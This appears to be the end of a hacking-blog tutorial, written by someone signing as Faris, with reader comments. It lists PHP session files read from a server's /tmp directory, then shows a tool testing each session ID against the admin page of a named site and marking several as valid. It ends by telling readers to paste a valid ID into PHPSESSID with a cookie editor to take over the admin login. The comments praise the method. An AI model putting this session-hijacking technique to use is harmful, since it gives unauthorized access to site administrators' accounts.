/tmp/sess_1d284bed1551e643b5a70ad39f8590f7<<
/tmp/sess_3a083268bbbb751c1759d63421518b5a<<
/tmp/sess_97dfdef38ba77aaafe4e386d477e930d<<
/tmp/sess_33d2df285cd3734f2deed74865443744<<
/tmp/sess_fabb287d2ff3b919af5000ab8dc8e33c<<
/tmp/sess_b41a68cd40a0574fa37daa5ae3f0ec61<<
/tmp/sess_b73ba10d0172c13cbdb2585bf6c665ac<<
/tmp/sess_ae7df29029efe96b0fc294e74b2394e9<<
/tmp/sess_4c1aa25c58809273af62eb5492abc75a<<
/tmp/sess_b578a4de47bc6af98d25c11e6c524872<<
/tmp/sess_5203c09b278787d10dc92aa080c23d48<<
/tmp/sess_f2bb07c4ccc3ad1e4b8702c1eb210d24<<
/tmp/sess_39cf0f3519d75a088ea26cdfd84f1b46<<
/tmp/sess_ceaa5793e59019cd645d90e4d1ca2c69<<
/tmp/sess_98cce2c66e80d107112ec1caa941f474<<
/tmp/sess_0f0171809b8b320cc0b6d419f6c24104<<
/tmp/sess_aad877ff29ba8a9d5653c43ffd9144ee<<
/tmp/sess_e38b0eadcf7cf06230f6474c5f81e0db<<
/tmp/sess_bab2660a7d2a8a107b2112d35af98d0b<<
/tmp/sess_8b237e6566987a213bdcbfcfcb54dc83<<
/tmp/sess_81096257f613fc79834e37ac41738f85<<
/tmp/sess_738aa845d5ba4056a4aa69570aea8b3d<<
/tmp/sess_b0e9381e6989e2ec823606a592edf7cc<<
/tmp/sess_9fee6051d245b55f673a339a936ca4a3<<
/tmp/sess_6d63714dcbb4d0f00041ba053e30eea4<<
/tmp/sess_90d1eed8c9313566b628a8f26cd554df<<
/tmp/sess_704589e1037052af2c81629c06921ce8<<
/tmp/sess_4389d6ff96fe47c85c59a642ac7341ec<<
/tmp/sess_79cb8d513a7fb687a76582a10dfbff81<<
/tmp/sess_ebdebb68236f91d838baadee14d3cc23<<
/tmp/sess_741d32deba96907eb88d8ec84e658c80<<
/tmp/sess_91d7ea0a970d41dfdd3097cbf4c6cbaa<<
/tmp/sess_a3d8980900fa769f6e7eb546bf9ee3bb<<
/tmp/sess_386fe619aaec64a7e7c9b0be2890adbe<<
/tmp/sess_0aff34027fbd7008849722b2ee5e66ce<<
/tmp/sess_c3cb7decc853071137690a497d01b966<<
/tmp/sess_17778d8aafea659415149557e417b00e<<
/tmp/sess_8ee603f731d2e00c5b845f7706dddd4d<<
/tmp/sess_d391201bfdd7c0bae0434602ceb5d0e3<<
/tmp/sess_ded58a053691ed59e2975faaccd34833<<
/tmp/sess_df72277989d9360e593949a4e9f509c5<<
/tmp/sess_bdea0cc8e1d055392a93b6719dae83ea<<
/tmp/sess_40462b85e1fea40ecabce0a9dd46d398<<
/tmp/sess_64201a62f49a39f6339c0eda500950d3<<
/tmp/sess_9a123847df0b3b85be0b0b478fca98b4<<
/tmp/sess_769850df895039f0746f71760bd3f757<<
/tmp/sess_ee2fcaa822411169fb0ffb82a1d76e7f<<
/tmp/sess_60a8d707fabb8ad12345325acfb5c9b2<<
/tmp/sess_793a585107eb25aee27238b81cb7e858<<
/tmp/sess_f73d493d91fc56153fe355c002791a0d<<
/tmp/sess_a259d974d9dcf27f9f4a918806a816f2<<
/tmp/sess_7454c7f51cc07a9f7801fd4c73c01d50<<
/tmp/sess_c33e4a44d6b6c75d4109a5d40bc77dd3<<
/tmp/sess_77b6813dea3235dccb5e55c8ab398c38<<
/tmp/sess_2cf772d1ab7fcdcb4f13c8477c5bf608<<
/tmp/sess_9220d1e185892ead3e84b8064fd51da6<<
/tmp/sess_f9f921470ee47444c7791e1a6815c366<<
/tmp/sess_06dfc858e29463e09b2ed44bc812b729<<
/tmp/sess_d4f8e678d8108ad70b28cb8fbb86602a<<
/tmp/sess_b1dad5c77d2e7759fff5de024f70bcd2<<
/tmp/sess_3d76378da05dfc275e7fa7534765b4e0<<
/tmp/sess_66756676551d15e75ddf4690bcfc4255<<
/tmp/sess_b060e45d0416fd1e0eeb2a2dbec3bf64<<
/tmp/sess_d6354cf7e8dd7206dca99f5494771014<<
/tmp/sess_1dbe9d966fc9ec157a903b13d89b6a6b<<
/tmp/sess_3aab149e17e00cdc1aa588dfc8d6742d<<
/tmp/sess_262711d9eb704659fe2313313077b60c<<
/tmp/sess_febad61f7b39b769858f02ae558f987c<<
/tmp/sess_f1060aacaef512550173ddbe6d6adfc3<<
/tmp/sess_d3cadb66de3bbf01e3ba52dcb1602605<<
/tmp/sess_678794d7b2951c106d3bd48cda4b2057<<
/tmp/sess_84f167bcbf44b8221660ad2511c6c549<<
/tmp/sess_494e3655809a2ccc934c259615b83188<<
/tmp/sess_8119ea71bbebf9c721478c90e44c65d9<<
/tmp/sess_a76072fa730980956806021d7b5738bd<<
/tmp/sess_5062dbb13be5cd38e5f5ef2192fa34d7<<
/tmp/sess_bb80110beeb860d2ad912efffb4d7888<<
/tmp/sess_572b6ed7c2f3cab110b38dfe53aebdcb<<
/tmp/sess_89d31a8b438ce6d999161e87bb28d66f<<
/tmp/sess_41d7a719a63e9e76bfca4d581027af07<<
/tmp/sess_2c60c90294f8aeb12ecb3e11f7114cc6<<
/tmp/sess_be57f9aeec7b02f7172f9d98fd79a7c3<<
/tmp/sess_71a756327f6ec13baeb4143c5249ae3d<<
/tmp/sess_4baa3c740a2a73d8b08dee8700609431<<
/tmp/sess_edc945a7c9962866ad8e44bfb955e53f<<
/tmp/sess_3d043749f61208cf261e832ba0975018<<
/tmp/sess_7ff76e6a11c522de8bef92f58fe965bb<<
/tmp/sess_d6c574ebaaff829c17270a7984cd395d<<
/tmp/sess_7033c937b40fdb75e54f74010a4a316a<<
/tmp/sess_55b315ed63e302d7da75c59b96a87361<<
/tmp/sess_afa364bd9cfc25e50a3912e24e0d18b6<<
/tmp/sess_b745731e79c480079c5412e6796aa844<<
/tmp/sess_50a726433fdf4c096e99a90b9f1180f4<<
/tmp/sess_333864077076ad1a6df84ca1fb2f8dc8<<
/tmp/sess_889ac846bb6d5c5df97b9fd7f926d861<<
/tmp/sess_2933b4ac9f6a8621e87fe24dee939520<<

-----------------------------------------
Admin Page Url# asa7be.me/user.php
Good Login Key# logout.php
- a60d366d9a2ad7a33516d742e0acb3c0 > Failed
- 7e6b48474d4622bbbfdb44a0abee3ae5 > Failed
- cf1487d4d364d0d5b5da78d6a2f1c829 > Failed
- b490eaf9813e7ce2f9f970ec5d5148a8 > Failed
[*] 69fb5a0be14029efa7823f36bba950a3 > Valid session
- af20ab592b6436a4b4662b3ef9d20949 > Failed
[*] 39492febe0be4657c8b74467a928ed86 > Valid session
- 08628cb08a83a88fb3b13cf0831ed2c2 > Failed
- 3fe3f2dfd3c53e47a47f4a287023e4f1 > Failed
- 7d3b2096da471dc454c7ebe37ea391a8 > Failed
- 0ae576840230a014d66d13876274b4ec > Failed
[*] d14f707dbacf3fc150d028d948a7783a > Valid session
- 3adfad96853e169b614eab8cbb33f399 > Failed
- e8eb5d28f2e9477146b5d77a4641f2fa > Failed
- 7054ba034eecd52aaee4daf29b3f083f > Failed
- a6b7407deff4c1ecf006beeb75816740 > Failed
- e8cebcc6e019029994a2ace049194c08 > Failed
- 26172952f18902859ff1cc6db5e7a5c2 > Failed
- 82acf501eee50586fafad1474ad3e6f8 > Failed
- bcc1e8dab78046443c25666ca3155e32 > Failed
- 323a64eadbe2a9f3d65c92698a8a80c8 > Failed
- 9ec31c6914e31acd0e309c062162e7f9 > Failed
- 936443410e7ff83a2ed87436fb385c8c > Failed
- cd5a0c95753e3edabe324b638181592d > Failed
- 6281d2ea4f929d5643f543c7ba6afe56 > Failed
- c28491c9d0761f286653d8dd2accf8f0 > Failed
- 8244ba71a97f1a014c4af61185a3d9ca > Failed
[*] d4a7db7eb38c2d27f3ae1c9b443c53d5 > Valid session
Now via any cookie Editor : PHPSESSID=session_id
and we are done ;)
./Faris

8 comments:

القط said...

good job faris :)

Faris said...

Thanks Mr Ap0calypse ,
why u r not online any more??

Anonymous said...

gr8 Tut! as always

the method is Extremely-Amazing


Best regards
14rQi 1337.

L3b-r1'z said...

King :D

Anonymous said...

brilliant faris
keep good work bro
(Thumbs Up)

Anonymous said...

Wow best idea from your mind
faris i see you
i see a big1337h4ck3r


see u letr

n4ss1m said...

nice ya 7ag :p , i didn't understand anything xD
nb : sometimes , ls /tmp/ => access denied :D

lollolbadr said...

جامد فحت يا برنسوووووووووووو
